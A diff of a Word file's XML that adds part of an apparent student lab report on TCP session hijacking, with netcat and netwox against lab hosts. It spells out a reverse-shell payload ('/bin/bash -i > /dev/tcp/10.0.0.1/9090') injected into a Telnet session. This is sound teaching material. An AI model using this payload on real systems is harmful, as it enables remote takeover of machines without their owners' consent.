+        <w:t xml:space="preserve">In the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal, run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and note the IP is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>10.0.0.1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (Figure 19)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">In one </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal, start</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> program to listen for connections on port 9090. (Figure 20)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">In another </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal, run the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netwox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attack from (Q7).</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The sequence number in the attack is the acknowledgment number of the last Telnet Data packet exchanged between </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and leg, the acknowledge number in the attack is the next sequence number of the same packet, destination port is the port on leg that established the connection and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">payload in the attack is the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hex of the command to create a bash shell: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>/bin/bash -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>/dev/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>/10.0.0.1/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The attack was successful because </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> has access to a shell in vic. This is seen when the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> program accepts a connection by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on port 9090 and by running </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> terminal and observing the IP as 10.0.0.3 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t>vic’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-CA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP). (Figure 20)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4015AAE3" wp14:editId="1B376E48">
+            <wp:extent cx="4543425" cy="1104900"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="17" name="Picture 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId23"/>
+                    <a:srcRect b="32558"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4543425" cy="1104900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>17</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> Opening telnet port 23 in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4D6D36" wp14:editId="6B637E2A">
+            <wp:extent cx="4619625" cy="1971675"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="18" name="Picture 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4619625" cy="1971675"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>18</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> telnet connection from leg to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02AEE3EC" wp14:editId="0A6A8BBC">
+            <wp:extent cx="4591050" cy="2333625"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="22" name="Picture 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4591050" cy="2333625"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>19</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> before </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43566746" wp14:editId="64C4CD5B">
+            <wp:extent cx="4619625" cy="3086100"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="20" name="Picture 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4619625" cy="3086100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>20</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> Reverse shell through </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> after</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId20"/>
+      <w:headerReference w:type="default" r:id="rId27"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -1657,6 +3076,96 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1EFA22DD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="78F83F96"/>
+    <w:lvl w:ilvl="0" w:tplc="BC6E3B5C">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hint="default"/>
+        <w:sz w:val="22"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="1009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="1009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="1009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="1009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="1009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28F612FF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F6C8EAE6"/>
@@ -1769,7 +3278,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2A1F2A1E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A42A5576"/>
@@ -1858,7 +3367,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="350E1346"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0A8E34CA"/>
@@ -1948,12 +3457,15 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="3">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="4">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
@@ -2561,19 +4073,19 @@
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
+  <w:font w:name="Times New Roman">
+    <w:panose1 w:val="02020603050405020304"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="roman"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
   <w:font w:name="Courier New">
     <w:panose1 w:val="02070309020205020404"/>
     <w:charset w:val="00"/>
     <w:family w:val="modern"/>
     <w:pitch w:val="fixed"/>
     <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Times New Roman">
-    <w:panose1 w:val="02020603050405020304"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="roman"/>
